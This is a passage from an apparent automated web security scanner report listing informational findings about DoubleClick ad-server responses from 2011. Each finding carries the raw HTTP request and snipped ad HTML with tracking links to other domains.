GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5875
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:44 GMT
Expires: Sun, 30 Jan 2011 17:24:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/Branding_Disaster_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;39992639&migRandom=4563724&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=39992639&randnum=4563724" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:27:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.9. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5877
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=6553387" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:29:44 GMT
Expires: Sun, 30 Jan 2011 01:29:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
82434&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=5982434&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

22.11. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
53387&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

22.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5219
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:45 GMT
Expires: Sun, 30 Jan 2011 17:24:45 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
64506&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=4564506&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

22.13. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 695

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/y;232242619;8-0;0;56133728;91-300/60;40295863/40313650/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlant"><img src="http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlant_4k_300x60.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.14. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 706
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/x;232242619;11-0;0;56133728;91-300/60;40295866/40313653/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlantBevel"><img src="http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlantBevel_6k_300x60.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.15. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6382
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:18 GMT
Expires: Sun, 30 Jan 2011 19:26:18 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Dec 22 18:48:14 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/c%3B232242619%3B5-0%3B0%3B56133728%3B91-300/60%3B39947599/39965386/1%3B%3B%7Esscs%3D%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PartnerCenter_AmerGirl"><img src="http://s0.2mdn.net/1150992/drt_300x60_americanGirl_fs_v2_19.3k.jpg" width="300" height="60" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.16. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.6

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=146794379?click=http://clk.atdmt.com/goiframe/198094467.198102269/148848786/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/148848786/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:30:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/4d/%2a/n
...[SNIP]...
-728/90;40019815/40037602/2;;~sscs=%3fhttp://clk.redcated/goiframe/198094467.198102269/148848786/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.17. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4826
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0071844/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/Womens_Rollback_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.18. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
